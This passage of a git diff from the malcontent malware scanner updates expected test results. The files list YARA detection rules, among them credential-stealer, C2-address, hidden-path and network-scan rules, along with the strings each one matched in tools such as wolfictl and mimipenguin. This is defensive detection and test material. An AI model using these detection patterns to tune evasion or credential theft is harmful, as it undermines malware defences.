[m_ip](https://github.com/search?q=m_ip&type=code)
[miss_port](https://github.com/search?q=miss_port&type=code)
[nIp](https://github.com/search?q=nIp&type=code)
[oIp](https://github.com/search?q=oIp&type=code)
[old_ip](https://github.com/search?q=old_ip&type=code)
[open_port](https://github.com/search?q=open_port&type=code)
[pages_ip](https://github.com/search?q=pages_ip&type=code)
[parsePort](https://github.com/search?q=parsePort&type=code)
[peerPort](https://github.com/search?q=peerPort&type=code)
[privateIp](https://github.com/search?q=privateIp&type=code)
[relay_port](https://github.com/search?q=relay_port&type=code)
[remotePort](https://github.com/search?q=remotePort&type=code)
[routedPort](https://github.com/search?q=routedPort&type=code)
[snmp_port](https://github.com/search?q=snmp_port&type=code)
[snmpd_port](https://github.com/search?q=snmpd_port&type=code)
[stripPort](https://github.com/search?q=stripPort&type=code)
[tIp](https://github.com/search?q=tIp&type=code)
[vIp](https://github.com/search?q=vIp&type=code) | +| MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [ConnectServer](https://github.com/search?q=ConnectServer&type=code) | | MEDIUM | [c2/discovery/ip_dns_resolver](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/discovery/ip-dns_resolver.yara#google_dns_ip) | contains Google Public DNS resolver IP | [8.8.8.8](https://github.com/search?q=8.8.8.8&type=code) | | MEDIUM | [collect/archives/unarchive](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/unarchive.yara#unarchive) | unarchives files | [UnarchiveProject](https://github.com/search?q=UnarchiveProject&type=code)
[unarchiveadmin](https://github.com/search?q=unarchiveadmin&type=code)
[unarchiveapp_configurations](https://github.com/search?q=unarchiveapp_configurations&type=code) | | MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [archive/zip](https://github.com/search?q=archive%2Fzip&type=code) | 
@@ -46,8 +47,8 @@ | MEDIUM | [discover/network/netstat](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/netstat.yara#netstat) | Uses 'netstat' for network information | [netstat](https://github.com/search?q=netstat&type=code) | | MEDIUM | [discover/system/sysinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/sysinfo.yara#sysinfo) | [get system information (load, swap)](https://man7.org/linux/man-pages/man2/sysinfo.2.html) | [sysinfo](https://github.com/search?q=sysinfo&type=code) | | MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) | -| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#dynamic_hidden_path) | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.ssh](https://github.com/search?q=%25s%2F.ssh&type=code) | -| MEDIUM | [evasion/hidden_paths/var_run](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/var-run.yara#var_run_subfolder) | references subfolder within /var/run | [/var/run/slapd/](https://github.com/search?q=%2Fvar%2Frun%2Fslapd%2F&type=code) | +| MEDIUM | [evasion/file/location/var_run](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/location/var-run.yara#var_run_subfolder) | references subfolder within /var/run | [/var/run/slapd/](https://github.com/search?q=%2Fvar%2Frun%2Fslapd%2F&type=code) | +| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#dynamic_hidden_path) | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | 
[%s/.ssh](https://github.com/search?q=%25s%2F.ssh&type=code) | | MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [ExecCommand](https://github.com/search?q=ExecCommand&type=code)
[Execute_Command_Line](https://github.com/search?q=Execute_Command_Line&type=code)
[MergeRunCmdOptions](https://github.com/search?q=MergeRunCmdOptions&type=code)
[RunCommandCursor](https://github.com/search?q=RunCommandCursor&type=code)
[StartCmdTrace](https://github.com/search?q=StartCmdTrace&type=code)
[StartCommandOptions](https://github.com/search?q=StartCommandOptions&type=code)
[execTxCommand](https://github.com/search?q=execTxCommand&type=code)
[executeCommand](https://github.com/search?q=executeCommand&type=code)
[processRunCommand](https://github.com/search?q=processRunCommand&type=code)
[runGitCommand](https://github.com/search?q=runGitCommand&type=code)
[runShellCommandAsynchronously](https://github.com/search?q=runShellCommandAsynchronously&type=code) | | MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#exec_cmd_run) | executes external programs | [).CombinedOutput](https://github.com/search?q=%29.CombinedOutput&type=code)
[exec.(*Cmd).Run](https://github.com/search?q=exec.%28%2ACmd%29.Run&type=code) | | MEDIUM | [exec/script/osa](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/script/osascript.yara#osascript_caller) | osascript caller | [display dialog](https://github.com/search?q=display+dialog&type=code) | @@ -68,7 +69,7 @@ | MEDIUM | [fs/proc/self_mountinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-mountinfo.yara#proc_self_mountinfo) | gets mount info associated to this process | [/proc/self/mountinfo](https://github.com/search?q=%2Fproc%2Fself%2Fmountinfo&type=code) | | MEDIUM | [impact/ddos](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/ddos/ddos.yara#ddos) | References DDoS | [DDoS](https://github.com/search?q=DDoS&type=code) | | MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [:CodeWithScopeSpacerheartbeatinterval](https://github.com/search?q=%3ACodeWithScopeSpacerheartbeatinterval&type=code)
[ConnServer heartbeat started](https://github.com/search?q=ConnServer+heartbeat+started&type=code)
[HeartbeatMS](https://github.com/search?q=HeartbeatMS&type=code)
[SetHeartbeatInterval](https://github.com/search?q=SetHeartbeatInterval&type=code)
[WithHeartbeatInterval](https://github.com/search?q=WithHeartbeatInterval&type=code)
[WithHeartbeatTimeout](https://github.com/search?q=WithHeartbeatTimeout&type=code)
[be greater than or equal to the heartbeat interva](https://github.com/search?q=be+greater+than+or+equal+to+the+heartbeat+interva&type=code)
[comWriteDocumentElementheartbeatfrequenc](https://github.com/search?q=comWriteDocumentElementheartbeatfrequenc&type=code)
[comheartbeatMain: re](https://github.com/search?q=comheartbeatMain%3A+re&type=code)
[crc32Rolling backcleanup docsheartbeat_msgeo_d](https://github.com/search?q=crc32Rolling+backcleanup+docsheartbeat_msgeo_d&type=code)
[edConnection pool clearedServer heartbeat failedS](https://github.com/search?q=edConnection+pool+clearedServer+heartbeat+failedS&type=code)
[edclient_sql_exceptionFailed to heartbeat](https://github.com/search?q=edclient_sql_exceptionFailed+to+heartbeat&type=code)
[eerror setting read deadline in heartbeater:](https://github.com/search?q=eerror+setting+read+deadline+in+heartbeater%3A&type=code)
[eonly valid as initial handshakeheartbeat is not](https://github.com/search?q=eonly+valid+as+initial+handshakeheartbeat+is+not&type=code)
[heartbeatCtxCance](https://github.com/search?q=heartbeatCtxCance&type=code)
[heartbeatFrame](https://github.com/search?q=heartbeatFrame&type=code)
[heartbeatInterval](https://github.com/search?q=heartbeatInterval&type=code)
[heartbeatLock](https://github.com/search?q=heartbeatLock&type=code)
[heartbeatTimeout](https://github.com/search?q=heartbeatTimeout&type=code)
[icedisableConsoleLoginfailed to heartbeat](https://github.com/search?q=icedisableConsoleLoginfailed+to+heartbeat&type=code)
[newHeartbeatDuration](https://github.com/search?q=newHeartbeatDuration&type=code)
[orcHeartbeating](https://github.com/search?q=orcHeartbeating&type=code)
[overflow reading version stringHeartbeats should](https://github.com/search?q=overflow+reading+version+stringHeartbeats+should&type=code)
[parquetheartbeat started](https://github.com/search?q=parquetheartbeat+started&type=code)
[parseHeartbeatFrame](https://github.com/search?q=parseHeartbeatFrame&type=code)
[pollHeartbeatTime](https://github.com/search?q=pollHeartbeatTime&type=code)
[publishServerHeartbeatFailedEv](https://github.com/search?q=publishServerHeartbeatFailedEv&type=code)
[publishServerHeartbeatStartedE](https://github.com/search?q=publishServerHeartbeatStartedE&type=code)
[publishServerHeartbeatSucceede](https://github.com/search?q=publishServerHeartbeatSucceede&type=code)
[setupHeartbeatConnecti](https://github.com/search?q=setupHeartbeatConnecti&type=code)
[sha1publickeysubsystemheartbeatwithcoor](https://github.com/search?q=sha1publickeysubsystemheartbeatwithcoor&type=code)
[sheartbeat stopped](https://github.com/search?q=sheartbeat+stopped&type=code)
[startHeartBeat](https://github.com/search?q=startHeartBeat&type=code)
[stopHeartBeat](https://github.com/search?q=stopHeartBeat&type=code)
[swordincludeRetryReasonstopping heartbeat](https://github.com/search?q=swordincludeRetryReasonstopping+heartbeat&type=code)
[tarting server monitoringServer heartbeat succeed](https://github.com/search?q=tarting+server+monitoringServer+heartbeat+succeed&type=code) | -| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Probe](https://github.com/search?q=Probe&type=code)
[banner](https://github.com/search?q=banner&type=code)
[connect](https://github.com/search?q=connect&type=code)
[gethostbyname](https://github.com/search?q=gethostbyname&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Port](https://github.com/search?q=Port&type=code)
[Probe](https://github.com/search?q=Probe&type=code)
[Target](https://github.com/search?q=Target&type=code)
[banner](https://github.com/search?q=banner&type=code)
[connect](https://github.com/search?q=connect&type=code)
[gethostbyname](https://github.com/search?q=gethostbyname&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | MEDIUM | [net/dns/reverse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-reverse.yara#in_addr_arpa) | looks up the reverse hostname for an IP | [.in-addr.arpa](https://github.com/search?q=.in-addr.arpa&type=code)
[ip6.arpa](https://github.com/search?q=ip6.arpa&type=code) | | MEDIUM | [net/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/download.yara#download) | download files | [DoneDownloadCond](https://github.com/search?q=DoneDownloadCond&type=code)
[DownloadArtifactsFile](https://github.com/search?q=DownloadArtifactsFile&type=code)
[DownloadAvatar](https://github.com/search?q=DownloadAvatar&type=code)
[DownloadContentsWithMeta](https://github.com/search?q=DownloadContentsWithMeta&type=code)
[DownloadPackageFile](https://github.com/search?q=DownloadPackageFile&type=code)
[DownloadReleaseAsset](https://github.com/search?q=DownloadReleaseAsset&type=code)
[ExportDownload](https://github.com/search?q=ExportDownload&type=code)
[FTPDownload](https://github.com/search?q=FTPDownload&type=code)
[FailedDownloads](https://github.com/search?q=FailedDownloads&type=code)
[FuncDownloadHelper](https://github.com/search?q=FuncDownloadHelper&type=code)
[GeoIpDownloadStatistics](https://github.com/search?q=GeoIpDownloadStatistics&type=code)
[GetArchiveDownloadURL](https://github.com/search?q=GetArchiveDownloadURL&type=code)
[GetBrowserDownloadURL](https://github.com/search?q=GetBrowserDownloadURL&type=code)
[GetDownloadCount](https://github.com/search?q=GetDownloadCount&type=code)
[GetDownloadLocation](https://github.com/search?q=GetDownloadLocation&type=code)
[GetDownloadURL](https://github.com/search?q=GetDownloadURL&type=code)
[GetDownloadsURL](https://github.com/search?q=GetDownloadsURL&type=code)
[GetHasDownloads](https://github.com/search?q=GetHasDownloads&type=code)
[GetTempDownloadToken](https://github.com/search?q=GetTempDownloadToken&type=code)
[MFA_TOKENdownload start chunk](https://github.com/search?q=MFA_TOKENdownload+start+chunk&type=code)
[NextDownloader](https://github.com/search?q=NextDownloader&type=code)
[NodeInfoIngestDownloader](https://github.com/search?q=NodeInfoIngestDownloader&type=code)
[STREAM_CHUNK_DOWNLOADSF_CLIENT_CONFIG](https://github.com/search?q=STREAM_CHUNK_DOWNLOADSF_CLIENT_CONFIG&type=code)
[SuccessfulDownloads](https://github.com/search?q=SuccessfulDownloads&type=code)
[URLDownloadToFile](https://github.com/search?q=URLDownloadToFile&type=code)
[addDownloader](https://github.com/search?q=addDownloader&type=code)
[archive_download_url](https://github.com/search?q=archive_download_url&type=code)
[browser_download_url](https://github.com/search?q=browser_download_url&type=code)
[chunkDownloader](https://github.com/search?q=chunkDownloader&type=code)
[chunk_downloader](https://github.com/search?q=chunk_downloader&type=code)
[downloadChunkHelper](https://github.com/search?q=downloadChunkHelper&type=code)
[downloadH](https://github.com/search?q=downloadH&type=code)
[downloadLocation](https://github.com/search?q=downloadLocation&type=code)
[downloadOCSPCacheServer](https://github.com/search?q=downloadOCSPCacheServer&type=code)
[downloadPatches](https://github.com/search?q=downloadPatches&type=code)
[download_count](https://github.com/search?q=download_count&type=code)
[downloader id](https://github.com/search?q=downloader+id&type=code)
[downloads_url](https://github.com/search?q=downloads_url&type=code)
[downloadsrepos](https://github.com/search?q=downloadsrepos&type=code)
[failed_downloads](https://github.com/search?q=failed_downloads&type=code)
[funcDownloadHelper](https://github.com/search?q=funcDownloadHelper&type=code)
[geoipdownloadstatistics](https://github.com/search?q=geoipdownloadstatistics&type=code)
[getNextChunkDownloader](https://github.com/search?q=getNextChunkDownloader&type=code)
[has_downloads](https://github.com/search?q=has_downloads&type=code)
[methodTotalDownloadTimeshards](https://github.com/search?q=methodTotalDownloadTimeshards&type=code)
[newStreamChunkDownloader](https://github.com/search?q=newStreamChunkDownloader&type=code)
[nodeinfoingestdownloader](https://github.com/search?q=nodeinfoingestdownloader&type=code)
[populateChunkDownloader](https://github.com/search?q=populateChunkDownloader&type=code)
[profileno download link found for](https://github.com/search?q=profileno+download+link+found+for&type=code)
[setNextChunkDownloader](https://github.com/search?q=setNextChunkDownloader&type=code)
[snowflakeChunkDownloader](https://github.com/search?q=snowflakeChunkDownloader&type=code)
[sstart downloading](https://github.com/search?q=sstart+downloading&type=code)
[streamChunkDownloader](https://github.com/search?q=streamChunkDownloader&type=code)
[successful_downloads](https://github.com/search?q=successful_downloads&type=code)
[tailChunkDownloader](https://github.com/search?q=tailChunkDownloader&type=code)
[temp_download_token](https://github.com/search?q=temp_download_token&type=code)
[the scheduleddownloads](https://github.com/search?q=the+scheduleddownloads&type=code)
[theequationsdownload](https://github.com/search?q=theequationsdownload&type=code)
[thresholddownloading error](https://github.com/search?q=thresholddownloading+error&type=code)
[total_download_time](https://github.com/search?q=total_download_time&type=code)
[useStreamDownloader](https://github.com/search?q=useStreamDownloader&type=code)
[vMaxChunkDownloadWorkers](https://github.com/search?q=vMaxChunkDownloadWorkers&type=code)
[vmsdownloading done](https://github.com/search?q=vmsdownloading+done&type=code)
[wcould not download file for scan](https://github.com/search?q=wcould+not+download+file+for+scan&type=code)
[wfailed to download patches](https://github.com/search?q=wfailed+to+download+patches&type=code)
[when trying to download file for scan](https://github.com/search?q=when+trying+to+download+file+for+scan&type=code) | | MEDIUM | [net/download/fetch](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/fetch.yara#curl_value) | Invokes curl | [curl / libcurl / php_curl](https://github.com/search?q=curl+%2F+libcurl+%2F+php_curl&type=code) | 
@@ -114,8 +115,9 @@ | LOW | [discover/cloud/aws_metadata](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/cloud/aws-metadata.yara#aws_metadata) | References the AWS EC2 metadata token | [X-aws-ec2-metadata-token](https://github.com/search?q=X-aws-ec2-metadata-token&type=code) | | LOW | [discover/cloud/google_metadata](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/cloud/google-metadata.yara#google_metadata) | Includes the token required to use the Google Cloud Platform metadata server | [Metadata-Flavor](https://github.com/search?q=Metadata-Flavor&type=code) | | LOW | [discover/cloud/google_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/cloud/google-storage.yara#go_import) | Capable of using Google Cloud Storage (GCS) | [cloud.google.com/go/storage](https://github.com/search?q=cloud.google.com%2Fgo%2Fstorage&type=code) | -| LOW | [discover/system/cpu_info](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/cpu-info.yara#processor_count) | [gets number of processors](https://man7.org/linux/man-pages/man3/get_nprocs.3.html) | [nproc](https://github.com/search?q=nproc&type=code) | -| LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [/proc/sys/kernel/hostname](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fhostname&type=code) | +| LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | +| LOW | [discover/system/cpu](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/cpu.yara#processor_count) | [gets number of processors](https://man7.org/linux/man-pages/man3/get_nprocs.3.html) | 
[nproc](https://github.com/search?q=nproc&type=code) | +| LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [/proc/sys/kernel/hostname](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fhostname&type=code) | | LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [syscall.Uname](https://github.com/search?q=syscall.Uname&type=code)
[uname](https://github.com/search?q=uname&type=code) | | LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
@@ -183,6 +185,5 @@ | LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real, effective, and saved group ID of process | [setgid](https://github.com/search?q=setgid&type=code) | | LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | | LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | -| LOW | [process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | | LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) |
diff --git a/tests/linux/clean/wolfictl.simple b/tests/linux/clean/wolfictl.simple
index b371cf324..519799bc3 100644
--- a/tests/linux/clean/wolfictl.simple
+++ b/tests/linux/clean/wolfictl.simple
@@ -45,8 +45,9 @@ discover/network/interface_list: medium
 discover/network/mac_address: medium
 discover/network/netstat: medium
 discover/processes/pgrep: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/dmesg: low
+discover/system/hostname: low
 discover/system/platform: medium
 discover/system/sysinfo: medium
 discover/user/HOME: low
@@ -54,9 +55,9 @@ discover/user/USER: low
 discover/user/name_get: medium
 evasion/bypass_security/linux/se: medium
 evasion/bypass_security/macos/xprotect: medium
-evasion/covert_location/dev_shm: medium
-evasion/hidden_paths/hidden: medium
-evasion/hide_artifacts/system_directories: medium
+evasion/file/location/dev_shm: medium
+evasion/file/location/system_directory: medium
+evasion/file/prefix: medium
 exec/cmd: medium
 exec/conditional/LANG: low
 exec/dylib/symbol_address: medium
diff --git a/tests/linux/clean/zipdetails.md b/tests/linux/clean/zipdetails.md
index 78f16d5fd..68b70d3b9 100644
--- a/tests/linux/clean/zipdetails.md
+++ b/tests/linux/clean/zipdetails.md
@@ -5,7 +5,7 @@ | MEDIUM | [anti-static/obfuscation/bitwise](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/bitwise.yara#bidirectional_bitwise_math) | [uses bitwise math in both directions](https://www.reversinglabs.com/blog/python-downloader-highlights-noise-problem-in-open-source-threat-detection) | [1 << 0](https://github.com/search?q=1+%3C%3C+0&type=code)
[1 << 11](https://github.com/search?q=1+%3C%3C+11&type=code)
[1 << 3](https://github.com/search?q=1+%3C%3C+3&type=code)
[1 << 4](https://github.com/search?q=1+%3C%3C+4&type=code)
[1 << 5](https://github.com/search?q=1+%3C%3C+5&type=code)
[1 << 6](https://github.com/search?q=1+%3C%3C+6&type=code)
[2 << 1](https://github.com/search?q=2+%3C%3C+1&type=code)
[dt << 1](https://github.com/search?q=dt+%3C%3C+1&type=code)
[dt >> 11](https://github.com/search?q=dt+%3E%3E+11&type=code)
[dt >> 16](https://github.com/search?q=dt+%3E%3E+16&type=code)
[dt >> 21](https://github.com/search?q=dt+%3E%3E+21&type=code)
[dt >> 25](https://github.com/search?q=dt+%3E%3E+25&type=code)
[dt >> 5](https://github.com/search?q=dt+%3E%3E+5&type=code)
[got << 8](https://github.com/search?q=got+%3C%3C+8&type=code)
[gp >> 1](https://github.com/search?q=gp+%3E%3E+1&type=code) | | MEDIUM | [anti-static/obfuscation/hex](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/hex.yara#excessive_hex_refs) | many references to hexadecimal values | [0x0001](https://github.com/search?q=0x0001&type=code)
[0x0007](https://github.com/search?q=0x0007&type=code)
[0x0008](https://github.com/search?q=0x0008&type=code)
[0x0009](https://github.com/search?q=0x0009&type=code)
[0x000a](https://github.com/search?q=0x000a&type=code)
[0x000c](https://github.com/search?q=0x000c&type=code)
[0x000d](https://github.com/search?q=0x000d&type=code)
[0x000e](https://github.com/search?q=0x000e&type=code)
[0x000f](https://github.com/search?q=0x000f&type=code)
[0x0014](https://github.com/search?q=0x0014&type=code)
[0x0015](https://github.com/search?q=0x0015&type=code)
[0x0016](https://github.com/search?q=0x0016&type=code)
[0x0017](https://github.com/search?q=0x0017&type=code)
[0x0018](https://github.com/search?q=0x0018&type=code)
[0x0019](https://github.com/search?q=0x0019&type=code)
[0x0020](https://github.com/search?q=0x0020&type=code)
[0x0021](https://github.com/search?q=0x0021&type=code)
[0x0022](https://github.com/search?q=0x0022&type=code)
[0x0023](https://github.com/search?q=0x0023&type=code)
[0x0065](https://github.com/search?q=0x0065&type=code)
[0x0066](https://github.com/search?q=0x0066&type=code)
[0x01](https://github.com/search?q=0x01&type=code)
[0x02014b50](https://github.com/search?q=0x02014b50&type=code)
[0x03](https://github.com/search?q=0x03&type=code)
[0x04034b50](https://github.com/search?q=0x04034b50&type=code)
[0x05054b50](https://github.com/search?q=0x05054b50&type=code)
[0x06054b50](https://github.com/search?q=0x06054b50&type=code)
[0x06064b50](https://github.com/search?q=0x06064b50&type=code)
[0x07064b50](https://github.com/search?q=0x07064b50&type=code)
[0x07c8](https://github.com/search?q=0x07c8&type=code)
[0x08064b50](https://github.com/search?q=0x08064b50&type=code)
[0x08074b50](https://github.com/search?q=0x08074b50&type=code)
[0x0f](https://github.com/search?q=0x0f&type=code)
[0x10000000](https://github.com/search?q=0x10000000&type=code)
[0x19DB1DED](https://github.com/search?q=0x19DB1DED&type=code)
[0x1f](https://github.com/search?q=0x1f&type=code)
[0x20](https://github.com/search?q=0x20&type=code)
[0x2146444e](https://github.com/search?q=0x2146444e&type=code)
[0x2605](https://github.com/search?q=0x2605&type=code)
[0x2705](https://github.com/search?q=0x2705&type=code)
[0x2805](https://github.com/search?q=0x2805&type=code)
[0x334d](https://github.com/search?q=0x334d&type=code)
[0x3e](https://github.com/search?q=0x3e&type=code)
[0x3f](https://github.com/search?q=0x3f&type=code)
[0x4154](https://github.com/search?q=0x4154&type=code)
[0x42726577](https://github.com/search?q=0x42726577&type=code)
[0x4341](https://github.com/search?q=0x4341&type=code)
[0x4453](https://github.com/search?q=0x4453&type=code)
[0x4690](https://github.com/search?q=0x4690&type=code)
[0x4704](https://github.com/search?q=0x4704&type=code)
[0x470f](https://github.com/search?q=0x470f&type=code)
[0x4854](https://github.com/search?q=0x4854&type=code)
[0x4b46](https://github.com/search?q=0x4b46&type=code)
[0x4c41](https://github.com/search?q=0x4c41&type=code)
[0x4d49](https://github.com/search?q=0x4d49&type=code)
[0x4d63](https://github.com/search?q=0x4d63&type=code)
[0x4f4c](https://github.com/search?q=0x4f4c&type=code)
[0x504b4453](https://github.com/search?q=0x504b4453&type=code)
[0x5356](https://github.com/search?q=0x5356&type=code)
[0x5455](https://github.com/search?q=0x5455&type=code)
[0x554e](https://github.com/search?q=0x554e&type=code)
[0x5855](https://github.com/search?q=0x5855&type=code)
[0x5a4c](https://github.com/search?q=0x5a4c&type=code)
[0x5a4d](https://github.com/search?q=0x5a4d&type=code)
[0x6375](https://github.com/search?q=0x6375&type=code)
[0x6542](https://github.com/search?q=0x6542&type=code)
[0x6854](https://github.com/search?q=0x6854&type=code)
[0x6dff800d](https://github.com/search?q=0x6dff800d&type=code)
[0x7075](https://github.com/search?q=0x7075&type=code)
[0x7109871a](https://github.com/search?q=0x7109871a&type=code)
[0x71777777](https://github.com/search?q=0x71777777&type=code)
[0x7441](https://github.com/search?q=0x7441&type=code)
[0x756e](https://github.com/search?q=0x756e&type=code)
[0x7855](https://github.com/search?q=0x7855&type=code)
[0x7875](https://github.com/search?q=0x7875&type=code)
[0x7FFF](https://github.com/search?q=0x7FFF&type=code)
[0x7f](https://github.com/search?q=0x7f&type=code)
[0x8000](https://github.com/search?q=0x8000&type=code)
[0x9901](https://github.com/search?q=0x9901&type=code)
[0xA220](https://github.com/search?q=0xA220&type=code)
[0xCAFE](https://github.com/search?q=0xCAFE&type=code)
[0xE9F3F9F0](https://github.com/search?q=0xE9F3F9F0&type=code)
[0xFFFFFFFF](https://github.com/search?q=0xFFFFFFFF&type=code)
[0xa11e](https://github.com/search?q=0xa11e&type=code)
[0xf05368c0](https://github.com/search?q=0xf05368c0&type=code)
[0xfb4a](https://github.com/search?q=0xfb4a&type=code)
[0xff3b5998](https://github.com/search?q=0xff3b5998&type=code)
[\x00](https://github.com/search?q=%5Cx00&type=code)
[\x01](https://github.com/search?q=%5Cx01&type=code) | | MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [ZIP64](https://github.com/search?q=ZIP64&type=code)
[zip files](https://github.com/search?q=zip+files&type=code) | -| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | +| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | | MEDIUM | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.linuxbrew/opt/perl/bin/perl](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fperl%2Fbin%2Fperl&type=code) | | LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [AES](https://github.com/search?q=AES&type=code) | | LOW | [fs/path/usr_bin](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/usr-bin.yara#usr_bin_path) | path reference within /usr/bin | [/usr/bin/perl](https://github.com/search?q=%2Fusr%2Fbin%2Fperl&type=code) |
diff --git a/tests/linux/mimipenguin/python/mimipenguin.simple b/tests/linux/mimipenguin/python/mimipenguin.simple
index bc884bf20..ea0e3b51a 100644
--- a/tests/linux/mimipenguin/python/mimipenguin.simple
+++ b/tests/linux/mimipenguin/python/mimipenguin.simple
@@ -7,6 +7,7 @@ credential/password/finder: high
 credential/ssh/d: medium
 data/base64/decode: medium
 data/encoding/base64: low
+discover/process/name: medium
 discover/processes/list: medium
 discover/system/platform: medium
 exfil/stealer/password: critical
